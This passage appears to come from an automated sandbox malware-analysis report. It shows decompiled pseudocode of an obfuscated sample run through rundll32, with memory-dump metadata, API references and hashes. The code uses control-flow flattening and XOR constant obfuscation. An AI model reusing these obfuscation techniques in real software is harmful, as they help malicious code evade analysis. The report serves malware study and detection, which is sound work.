                                                                                                                                  						goto L32;
                                                                                                                                  					}
                                                                                                                                  					E002E8519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
                                                                                                                                  					_t374 = 0xf828486;
                                                                                                                                  					_t347 = 0xfb52c5;
                                                                                                                                  					goto L30;
                                                                                                                                  				}
                                                                                                                                  			}






















                                                                                                                                  0x002d85c8
                                                                                                                                  0x002d85cc
                                                                                                                                  0x002d85d0
                                                                                                                                  0x002d85d4
                                                                                                                                  0x002d85dc
                                                                                                                                  0x002d85e4
                                                                                                                                  0x002d85ec
                                                                                                                                  0x002d85f4
                                                                                                                                  0x002d8607
                                                                                                                                  0x002d860e
                                                                                                                                  0x002d8619
                                                                                                                                  0x002d8621
                                                                                                                                  0x002d8626
                                                                                                                                  0x002d8633
                                                                                                                                  0x002d8637
                                                                                                                                  0x002d863f
                                                                                                                                  0x002d864a
                                                                                                                                  0x002d8655
                                                                                                                                  0x002d8660
                                                                                                                                  0x002d866d
                                                                                                                                  0x002d8671
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x00000000
                                                                                                                                  0x002d867e
                                                                                                                                  0x002d868c
                                                                                                                                  0x002d8806
                                                                                                                                  0x002d880b
                                                                                                                                  0x002d880e
                                                                                                                                  0x002d8810
                                                                                                                                  0x002d8854
                                                                                                                                  0x002d8812
                                                                                                                                  0x002d8812
                                                                                                                                  0x002d8814
                                                                                                                                  0x002d8814
                                                                                                                                  0x002d8818
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d881a
                                                                                                                                  0x002d8832
                                                                                                                                  0x002d8837
                                                                                                                                  0x002d883a
                                                                                                                                  0x002d883c
                                                                                                                                  0x002d884a
                                                                                                                                  0x002d884b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8864
                                                                                                                                  0x002d8864
                                                                                                                                  0x00000000
                                                                                                                                  0x002d883e
                                                                                                                                  0x002d883e
                                                                                                                                  0x002d8840
                                                                                                                                  0x002d8842
                                                                                                                                  0x002d885d
                                                                                                                                  0x002d8844
                                                                                                                                  0x002d8844
                                                                                                                                  0x002d8814
                                                                                                                                  0x002d8818
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8818
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8842
                                                                                                                                  0x002d8814
                                                                                                                                  0x002d8868
                                                                                                                                  0x002d8868
                                                                                                                                  0x002d886a
                                                                                                                                  0x002d888d
                                                                                                                                  0x002d8892
                                                                                                                                  0x00000000
                                                                                                                                  0x002d886c
                                                                                                                                  0x002d8870
                                                                                                                                  0x002d887d
                                                                                                                                  0x002d8883
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8883
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8692
                                                                                                                                  0x002d8698
                                                                                                                                  0x002d87b9
                                                                                                                                  0x002d87be
                                                                                                                                  0x002d87c0
                                                                                                                                  0x002d87c3
                                                                                                                                  0x002d87c6
                                                                                                                                  0x002d87cc
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d869e
                                                                                                                                  0x002d86a4
                                                                                                                                  0x002d874a
                                                                                                                                  0x002d8765
                                                                                                                                  0x002d876a
                                                                                                                                  0x002d876c
                                                                                                                                  0x002d8771
                                                                                                                                  0x002d8776
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d8679
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8679
                                                                                                                                  0x002d86aa
                                                                                                                                  0x002d86b0
                                                                                                                                  0x002d86ff
                                                                                                                                  0x002d870e
                                                                                                                                  0x002d870f
                                                                                                                                  0x002d8710
                                                                                                                                  0x002d871a
                                                                                                                                  0x002d871c
                                                                                                                                  0x002d8722
                                                                                                                                  0x002d8729
                                                                                                                                  0x00000000
                                                                                                                                  0x002d86b2
                                                                                                                                  0x002d86b8
                                                                                                                                  0x002d86f4
                                                                                                                                  0x00000000
                                                                                                                                  0x002d86ba
                                                                                                                                  0x002d86c0
                                                                                                                                  0x002d88b2
                                                                                                                                  0x002d88b2
                                                                                                                                  0x002d88b8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d88be
                                                                                                                                  0x002d86c6
                                                                                                                                  0x002d86dd
                                                                                                                                  0x002d86e2
                                                                                                                                  0x002d86c0
                                                                                                                                  0x002d86b8
                                                                                                                                  0x002d86b0
                                                                                                                                  0x002d86a4
                                                                                                                                  0x002d8698
                                                                                                                                  0x002d86f1
                                                                                                                                  0x00000000
                                                                                                                                  0x002d86f1
                                                                                                                                  0x002d88a2
                                                                                                                                  0x002d88a8
                                                                                                                                  0x002d88ad
                                                                                                                                  0x00000000
                                                                                                                                  0x002d88ad

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                                  • API String ID: 0-1837206032
                                                                                                                                  • Opcode ID: d1e41e8ef5e801ec9708898aff3e536e452fb137e050c35b12e027b904cf4b9c
                                                                                                                                  • Instruction ID: 46f93492d4d395c41652d8c8c183db9814e03ae9262db643a20f3bd203dab54b
                                                                                                                                  • Opcode Fuzzy Hash: d1e41e8ef5e801ec9708898aff3e536e452fb137e050c35b12e027b904cf4b9c
                                                                                                                                  • Instruction Fuzzy Hash: 02022F711183819FD368CF25C48AA5BBBE1FBC4758F508A1DF69A86260DBB4C949CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E002DE2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				char _v556;
                                                                                                                                  				intOrPtr _v576;
                                                                                                                                  				char _v600;
                                                                                                                                  				signed int _v604;
                                                                                                                                  				signed int _v608;
                                                                                                                                  				signed int _v612;
                                                                                                                                  				signed int _v616;
                                                                                                                                  				signed int _v620;
                                                                                                                                  				signed int _v624;
                                                                                                                                  				signed int _v628;
                                                                                                                                  				signed int _v632;
                                                                                                                                  				signed int _v636;
                                                                                                                                  				signed int _v640;
                                                                                                                                  				signed int _v644;
                                                                                                                                  				signed int _v648;
                                                                                                                                  				signed int _v652;
                                                                                                                                  				void* __ecx;
                                                                                                                                  				void* _t136;
                                                                                                                                  				void* _t151;
                                                                                                                                  				signed int _t153;
                                                                                                                                  				signed int _t156;
                                                                                                                                  				void* _t162;
                                                                                                                                  				signed int _t167;
                                                                                                                                  				intOrPtr _t187;
                                                                                                                                  				signed int _t188;
                                                                                                                                  				signed int _t189;
                                                                                                                                  				signed int _t190;
                                                                                                                                  				signed int _t191;
                                                                                                                                  				signed int _t192;
                                                                                                                                  				signed int* _t196;
                                                                                                                                  
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_t187 = _a8;
                                                                                                                                  				_push(_t187);
                                                                                                                                  				_push(E002D8E4D);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				E002E20B9(_t136);
                                                                                                                                  				_v608 = 0x1ac257;
                                                                                                                                  				_t196 =  &(( &_v652)[5]);
                                                                                                                                  				_v608 = _v608 ^ 0x78a3296c;
                                                                                                                                  				_v608 = _v608 ^ 0x78b9eb39;
                                                                                                                                  				_t162 = 0xac58df2;
                                                                                                                                  				_v624 = 0x387e66;
                                                                                                                                  				_t9 =  &_v624; // 0x387e66
                                                                                                                                  				_t188 = 0x2e;
                                                                                                                                  				_v624 =  *_t9 * 0x13;
                                                                                                                                  				_v624 = _v624 / _t188;
                                                                                                                                  				_v624 = _v624 ^ 0x001972d5;
                                                                                                                                  				_v644 = 0x433552;
                                                                                                                                  				_v644 = _v644 + 0xffffa6b6;
                                                                                                                                  				_v644 = _v644 ^ 0x94defa20;
                                                                                                                                  				_v644 = _v644 << 1;
                                                                                                                                  				_v644 = _v644 ^ 0x293db944;
                                                                                                                                  				_v652 = 0xb70b59;
                                                                                                                                  				_v652 = _v652 << 0xb;
                                                                                                                                  				_v652 = _v652 + 0xffff8138;
                                                                                                                                  				_t189 = 0x15;
                                                                                                                                  				_v652 = _v652 / _t189;
                                                                                                                                  				_v652 = _v652 ^ 0x08c5a62f;
                                                                                                                                  				_v616 = 0xf4782f;
                                                                                                                                  				_v616 = _v616 >> 0xa;
                                                                                                                                  				_v616 = _v616 + 0xffff066a;
                                                                                                                                  				_v616 = _v616 ^ 0xfff8c7bc;
                                                                                                                                  				_v604 = 0x656560;
                                                                                                                                  				_v604 = _v604 >> 3;
                                                                                                                                  				_v604 = _v604 ^ 0x0000606f;
                                                                                                                                  				_v648 = 0x377d9b;
                                                                                                                                  				_t190 = 0x7f;
                                                                                                                                  				_v648 = _v648 / _t190;
                                                                                                                                  				_v648 = _v648 + 0xfd7f;
                                                                                                                                  				_v648 = _v648 + 0xffff6b0a;
                                                                                                                                  				_v648 = _v648 ^ 0x00006649;
                                                                                                                                  				_v636 = 0x80cedd;
                                                                                                                                  				_t191 = 0x58;
                                                                                                                                  				_v636 = _v636 / _t191;
                                                                                                                                  				_v636 = _v636 + 0x515e;
                                                                                                                                  				_v636 = _v636 ^ 0x000b92de;
                                                                                                                                  				_v620 = 0x65d9bd;
                                                                                                                                  				_v620 = _v620 + 0xffff4b50;
                                                                                                                                  				_v620 = _v620 ^ 0xd34cfccc;
                                                                                                                                  				_v620 = _v620 ^ 0xd32e4bd2;
                                                                                                                                  				_v632 = 0xb89e86;
                                                                                                                                  				_v632 = _v632 + 0xffffcc79;
                                                                                                                                  				_t192 = 0x2f;
                                                                                                                                  				_v632 = _v632 / _t192;
                                                                                                                                  				_v632 = _v632 ^ 0x00046a67;
                                                                                                                                  				_v628 = 0xbb1c4a;
                                                                                                                                  				_v628 = _v628 >> 6;
                                                                                                                                  				_v628 = _v628 >> 9;
                                                                                                                                  				_v628 = _v628 ^ 0x000a4ee8;
                                                                                                                                  				_v640 = 0xfd7114;
                                                                                                                                  				_v640 = _v640 << 5;
                                                                                                                                  				_v640 = _v640 * 0x45;
                                                                                                                                  				_v640 = _v640 + 0xa2ea;
                                                                                                                                  				_v640 = _v640 ^ 0x89e0c310;
                                                                                                                                  				_v612 = 0x26e293;
                                                                                                                                  				_v612 = _v612 >> 0xd;
                                                                                                                                  				_v612 = _v612 ^ 0x00050986;
                                                                                                                                  				_t193 = _v612;
                                                                                                                                  				do {
                                                                                                                                  					while(_t162 != 0x249e110) {
                                                                                                                                  						if(_t162 == 0x48c9d54) {
                                                                                                                                  							_v556 = 0x22c;
                                                                                                                                  							_t153 = E002EC15D(_t193, _v652, _v616,  &_v556, _v604);
                                                                                                                                  							_t196 =  &(_t196[3]);
                                                                                                                                  							asm("sbb ecx, ecx");
                                                                                                                                  							_t167 =  ~_t153 & 0xf758a92f;
                                                                                                                                  							L13:
                                                                                                                                  							_t162 = _t167 + 0xe63f1a5;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t162 == 0x5bc9ad4) {
                                                                                                                                  							_t156 = E002D8E4D( &_v556,  &_v600);
                                                                                                                                  							asm("sbb ecx, ecx");
                                                                                                                                  							_t167 =  ~_t156 & 0xf3e5ef6b;
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						if(_t162 == 0xac58df2) {
                                                                                                                                  							_v576 = _t187;
                                                                                                                                  							_t162 = 0xcf1a497;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t162 != 0xcf1a497) {
                                                                                                                                  							if(_t162 == 0xe63f1a5) {
                                                                                                                                  								return E002E1E67(_v632, _v628, _v640, _v612, _t193);
                                                                                                                                  							}
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						_push(_t162);
                                                                                                                                  						_t156 = E002D5988(_t162, _v608);
                                                                                                                                  						_t193 = _t156;
                                                                                                                                  						if(_t156 != 0xffffffff) {
                                                                                                                                  							_t162 = 0x48c9d54;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						L8:
                                                                                                                                  						return _t156;
                                                                                                                                  					}
                                                                                                                                  					_t151 = E002D2A58(_v648, _t193,  &_v556, _v636, _v620);
                                                                                                                                  					_t196 =  &(_t196[3]);
                                                                                                                                  					if(_t151 == 0) {
                                                                                                                                  						_t162 = 0xe63f1a5;
                                                                                                                                  						goto L18;
                                                                                                                                  					} else {
                                                                                                                                  						_t162 = 0x5bc9ad4;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L8;
                                                                                                                                  					L18:
                                                                                                                                  				} while (_t162 != 0xad68edc);
                                                                                                                                  				return _t156;
                                                                                                                                  			}

































                                                                                                                                  0x002de5be
                                                                                                                                  0x002de5be
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                                  • API String ID: 0-3572798563
                                                                                                                                  • Opcode ID: 1a668e16f1afb0189231fe901590b28768e61ec28d9c6243d1cf595df6961a24
                                                                                                                                  • Instruction ID: 4301a6f8d0f9e19b7bd22c9926c4afa94f1aa4ae1d5f1882b9cb835fb513c2e4
                                                                                                                                  • Opcode Fuzzy Hash: 1a668e16f1afb0189231fe901590b28768e61ec28d9c6243d1cf595df6961a24
                                                                                                                                  • Instruction Fuzzy Hash: 15718772518301DFC758DF22D88945FBBE1EBC4768F504A1EF4869A2A0D775CA19CF82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                                    • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                  • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                                    • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                                  • String ID: LOC
                                                                                                                                  • API String ID: 3864805678-519433814
                                                                                                                                  • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                  • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                                  • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                  • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002DCF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                                                                                  				char _v32;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				intOrPtr _v56;
                                                                                                                                  				intOrPtr _v88;
                                                                                                                                  				char* _v92;
                                                                                                                                  				char _v112;
                                                                                                                                  				char _v120;
                                                                                                                                  				intOrPtr _v124;
                                                                                                                                  				char _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				signed int _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				signed int _v152;
                                                                                                                                  				signed int _v156;
                                                                                                                                  				signed int _v160;
                                                                                                                                  				signed int _v164;
                                                                                                                                  				signed int _v168;
                                                                                                                                  				signed int _v172;
                                                                                                                                  				signed int _v176;
                                                                                                                                  				signed int _v180;
                                                                                                                                  				signed int _v184;
                                                                                                                                  				signed int _v188;
                                                                                                                                  				signed int _v192;
                                                                                                                                  				signed int _v196;
                                                                                                                                  				signed int _v200;
                                                                                                                                  				signed int _v204;
                                                                                                                                  				signed int _v208;
                                                                                                                                  				signed int _v212;
                                                                                                                                  				signed int _v216;
                                                                                                                                  				signed int _v220;
                                                                                                                                  				signed int _v224;
                                                                                                                                  				signed int _v228;
                                                                                                                                  				signed int _v232;
                                                                                                                                  				signed int _v236;
                                                                                                                                  				signed int _v240;
                                                                                                                                  				signed int _v244;
                                                                                                                                  				signed int _v248;
                                                                                                                                  				signed int _v252;
                                                                                                                                  				signed int _v256;
                                                                                                                                  				signed int _v260;
                                                                                                                                  				signed int _v264;
                                                                                                                                  				signed int _v268;
                                                                                                                                  				void* _t345;
                                                                                                                                  				void* _t377;
                                                                                                                                  				void* _t378;
                                                                                                                                  				void* _t386;
                                                                                                                                  				void* _t393;
                                                                                                                                  				intOrPtr _t403;
                                                                                                                                  				intOrPtr* _t406;
                                                                                                                                  				void* _t408;
                                                                                                                                  				signed char* _t414;
                                                                                                                                  				signed char* _t450;
                                                                                                                                  				intOrPtr* _t455;
                                                                                                                                  				intOrPtr _t456;
                                                                                                                                  				intOrPtr _t457;
                                                                                                                                  				void* _t458;
                                                                                                                                  				signed char* _t459;
                                                                                                                                  				signed int _t460;
                                                                                                                                  				signed int _t461;
                                                                                                                                  				signed int _t462;
                                                                                                                                  				signed int _t463;
                                                                                                                                  				signed int _t464;
                                                                                                                                  				signed int _t465;
                                                                                                                                  				signed int _t466;
                                                                                                                                  				signed int _t467;
                                                                                                                                  				signed int _t468;
                                                                                                                                  				signed int _t469;
                                                                                                                                  				void* _t470;
                                                                                                                                  				void* _t471;
                                                                                                                                  				void* _t474;
                                                                                                                                  
                                                                                                                                  				_t406 = _a8;
                                                                                                                                  				_t456 = _a4;
                                                                                                                                  				_push(_a20);
                                                                                                                                  				_t455 = _a16;
                                                                                                                                  				_push(_t455);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_t406);
                                                                                                                                  				_push(_t456);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t345);
                                                                                                                                  				_v256 = 0xcf1dac;
                                                                                                                                  				_t471 = _t470 + 0x1c;
                                                                                                                                  				_v256 = _v256 ^ 0x662b1d0f;
                                                                                                                                  				_v256 = _v256 << 2;
                                                                                                                                  				_t408 = 0x8e80a37;
                                                                                                                                  				_v256 = _v256 + 0xffff9089;
                                                                                                                                  				_v256 = _v256 ^ 0x9b8f9315;
                                                                                                                                  				_v160 = 0x25617a;
                                                                                                                                  				_v160 = _v160 << 2;
                                                                                                                                  				_v160 = _v160 ^ 0x009585a8;
                                                                                                                                  				_v264 = 0x39e017;
                                                                                                                                  				_v264 = _v264 + 0xffffbc9c;
                                                                                                                                  				_v264 = _v264 ^ 0xb11c7ead;
                                                                                                                                  				_v264 = _v264 + 0xffffd7b2;
                                                                                                                                  				_v264 = _v264 ^ 0xb125b990;
                                                                                                                                  				_v240 = 0xb82586;
                                                                                                                                  				_t460 = 0x74;
                                                                                                                                  				_v240 = _v240 / _t460;
                                                                                                                                  				_v240 = _v240 << 1;
                                                                                                                                  				_t461 = 0x3b;
                                                                                                                                  				_v132 = _v132 & 0x00000000;
                                                                                                                                  				_v240 = _v240 * 0x36;
                                                                                                                                  				_v240 = _v240 ^ 0x00aace1a;
                                                                                                                                  				_v180 = 0xcab8fe;
                                                                                                                                  				_v180 = _v180 ^ 0xca9451c5;
                                                                                                                                  				_v180 = _v180 | 0x3e03c42f;
                                                                                                                                  				_v180 = _v180 ^ 0xfe5c53ad;
                                                                                                                                  				_v248 = 0x57862;
                                                                                                                                  				_v248 = _v248 | 0x3f7dcfba;
                                                                                                                                  				_v248 = _v248 / _t461;
                                                                                                                                  				_t462 = 0x62;
                                                                                                                                  				_v248 = _v248 / _t462;
                                                                                                                                  				_v248 = _v248 ^ 0x00057d9a;
                                                                                                                                  				_v252 = 0x68f561;
                                                                                                                                  				_v252 = _v252 << 6;
                                                                                                                                  				_v252 = _v252 >> 0xd;
                                                                                                                                  				_v252 = _v252 | 0x3cddc102;
                                                                                                                                  				_v252 = _v252 ^ 0x3cda88f2;
                                                                                                                                  				_v192 = 0x7c8e99;
                                                                                                                                  				_v192 = _v192 + 0x829c;
                                                                                                                                  				_v192 = _v192 * 0x31;
                                                                                                                                  				_v192 = _v192 ^ 0x17fda794;
                                                                                                                                  				_v228 = 0x74d91a;
                                                                                                                                  				_v228 = _v228 << 3;
                                                                                                                                  				_v228 = _v228 + 0x7502;
                                                                                                                                  				_v228 = _v228 * 0x63;
                                                                                                                                  				_v228 = _v228 ^ 0x69a7ce60;
                                                                                                                                  				_v208 = 0xc909ae;
                                                                                                                                  				_v208 = _v208 << 1;
                                                                                                                                  				_t463 = 0xb;
                                                                                                                                  				_v208 = _v208 / _t463;
                                                                                                                                  				_v208 = _v208 ^ 0x00276772;
                                                                                                                                  				_v164 = 0x673800;
                                                                                                                                  				_v164 = _v164 << 9;
                                                                                                                                  				_v164 = _v164 ^ 0xce7e8a93;
                                                                                                                                  				_v232 = 0xb859bd;
                                                                                                                                  				_v232 = _v232 + 0xde76;
                                                                                                                                  				_t464 = 0x5b;
                                                                                                                                  				_v232 = _v232 * 0x1c;
                                                                                                                                  				_v232 = _v232 * 0x30;
                                                                                                                                  				_v232 = _v232 ^ 0xcc63b0a7;
                                                                                                                                  				_v172 = 0x7eda56;
                                                                                                                                  				_v172 = _v172 << 3;
                                                                                                                                  				_v172 = _v172 ^ 0x03f50911;
                                                                                                                                  				_v184 = 0x2f7891;
                                                                                                                                  				_v184 = _v184 / _t464;
                                                                                                                                  				_t465 = 0x41;
                                                                                                                                  				_v184 = _v184 * 0x49;
                                                                                                                                  				_v184 = _v184 ^ 0x0024fbf7;
                                                                                                                                  				_v148 = 0x4a0bea;
                                                                                                                                  				_v148 = _v148 ^ 0x502016f1;
                                                                                                                                  				_v148 = _v148 ^ 0x506ad42a;
                                                                                                                                  				_v260 = 0x9ebd58;
                                                                                                                                  				_v260 = _v260 >> 8;
                                                                                                                                  				_v260 = _v260 << 0xf;
                                                                                                                                  				_v260 = _v260 + 0xb306;
                                                                                                                                  				_v260 = _v260 ^ 0x4f54a3e8;
                                                                                                                                  				_v204 = 0xce3506;
                                                                                                                                  				_v204 = _v204 << 0xf;
                                                                                                                                  				_v204 = _v204 << 0xc;
                                                                                                                                  				_v204 = _v204 ^ 0x300ddb73;
                                                                                                                                  				_v244 = 0xe7c592;
                                                                                                                                  				_v244 = _v244 >> 5;
                                                                                                                                  				_v244 = _v244 ^ 0x506a7775;
                                                                                                                                  				_v244 = _v244 << 1;
                                                                                                                                  				_v244 = _v244 ^ 0xa0d2afa7;
                                                                                                                                  				_v268 = 0x1d8a79;
                                                                                                                                  				_v268 = _v268 << 2;
                                                                                                                                  				_v268 = _v268 / _t465;
                                                                                                                                  				_v268 = _v268 | 0x253986a4;
                                                                                                                                  				_v268 = _v268 ^ 0x2531568a;
                                                                                                                                  				_v216 = 0x116531;
                                                                                                                                  				_t466 = 0x61;
                                                                                                                                  				_v216 = _v216 * 0x66;
                                                                                                                                  				_v216 = _v216 ^ 0xfffdc9ed;
                                                                                                                                  				_v216 = _v216 ^ 0xf917010b;
                                                                                                                                  				_v200 = 0xc05f9c;
                                                                                                                                  				_v200 = _v200 / _t466;
                                                                                                                                  				_v200 = _v200 * 0x6f;
                                                                                                                                  				_v200 = _v200 ^ 0x00dca3d1;
                                                                                                                                  				_v212 = 0xdb89ea;
                                                                                                                                  				_v212 = _v212 >> 0xa;
                                                                                                                                  				_v212 = _v212 >> 9;
                                                                                                                                  				_v212 = _v212 ^ 0x0000ad8d;
                                                                                                                                  				_v152 = 0x38fb70;
                                                                                                                                  				_v152 = _v152 ^ 0x310cc67b;
                                                                                                                                  				_v152 = _v152 ^ 0x313af23a;
                                                                                                                                  				_v136 = 0x7e2008;
                                                                                                                                  				_v136 = _v136 ^ 0x7ad3030b;
                                                                                                                                  				_v136 = _v136 ^ 0x7aaaa86e;
                                                                                                                                  				_v196 = 0x9c4278;
                                                                                                                                  				_t467 = 0x4e;
                                                                                                                                  				_v196 = _v196 * 0x7e;
                                                                                                                                  				_v196 = _v196 ^ 0xa26962db;
                                                                                                                                  				_v196 = _v196 ^ 0xee89d9da;
                                                                                                                                  				_v220 = 0x1e88f4;
                                                                                                                                  				_v220 = _v220 >> 4;
                                                                                                                                  				_v220 = _v220 >> 7;
                                                                                                                                  				_v220 = _v220 ^ 0x000c14cc;
                                                                                                                                  				_v140 = 0xc2e6ba;
                                                                                                                                  				_v140 = _v140 + 0x8875;
                                                                                                                                  				_v140 = _v140 ^ 0x00c43ba1;
                                                                                                                                  				_v188 = 0xdb74c;
                                                                                                                                  				_v188 = _v188 << 4;
                                                                                                                                  				_v188 = _v188 * 0x5c;
                                                                                                                                  				_v188 = _v188 ^ 0x4edda20a;
                                                                                                                                  				_v236 = 0x62ea5;
                                                                                                                                  				_v236 = _v236 / _t467;
                                                                                                                                  				_v236 = _v236 >> 0xb;
                                                                                                                                  				_v236 = _v236 ^ 0x7372adb3;
                                                                                                                                  				_v236 = _v236 ^ 0x73757ff2;
                                                                                                                                  				_v144 = 0x2b6271;
                                                                                                                                  				_v144 = _v144 ^ 0x1ac7dce1;
                                                                                                                                  				_v144 = _v144 ^ 0x1ae73668;
                                                                                                                                  				_v224 = 0x8bb898;
                                                                                                                                  				_v224 = _v224 + 0x43a9;
                                                                                                                                  				_v224 = _v224 << 0x10;
                                                                                                                                  				_t468 = 0x71;
                                                                                                                                  				_t469 = _v132;
                                                                                                                                  				_v224 = _v224 / _t468;
                                                                                                                                  				_v224 = _v224 ^ 0x023712cd;
                                                                                                                                  				_v156 = 0xb23c07;
                                                                                                                                  				_v156 = _v156 + 0x4ded;
                                                                                                                                  				_v156 = _v156 ^ 0x00b7ca1c;
                                                                                                                                  				_v168 = 0xb501ce;
                                                                                                                                  				_v168 = _v168 ^ 0x6706c67f;
                                                                                                                                  				_v168 = _v168 ^ 0x67b3c7a1;
                                                                                                                                  				_v176 = 0xab8984;
                                                                                                                                  				_v176 = _v176 * 0x22;
                                                                                                                                  				_v176 = _v176 ^ 0x16c84308;
                                                                                                                                  				goto L1;
                                                                                                                                  				do {
                                                                                                                                  					while(1) {
                                                                                                                                  						L1:
                                                                                                                                  						_t474 = _t408 - 0xd9acfaa;
                                                                                                                                  						if(_t474 > 0) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						if(_t474 == 0) {
                                                                                                                                  							E002E8519(_v236, _v144, _v128);
                                                                                                                                  							_t408 = 0xfbb751f;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t408 == 0x15a913b) {
                                                                                                                                  							_v40 = _t456;
                                                                                                                                  							_v92 =  &_v32;
                                                                                                                                  							_v56 =  *_t455;
                                                                                                                                  							_v52 =  *((intOrPtr*)(_t455 + 4));
                                                                                                                                  							_v88 = 0x20;
                                                                                                                                  							_t393 = E002D7735(_v192,  &_v112,  &_v120, _v228, _v208);
                                                                                                                                  							_t471 = _t471 + 0x10;
                                                                                                                                  							if(_t393 == 0) {
                                                                                                                                  								L20:
                                                                                                                                  								return _v132;
                                                                                                                                  							}
                                                                                                                                  							_t408 = 0xf0a856e;
                                                                                                                                  							continue;
                                                                                                                                  						}
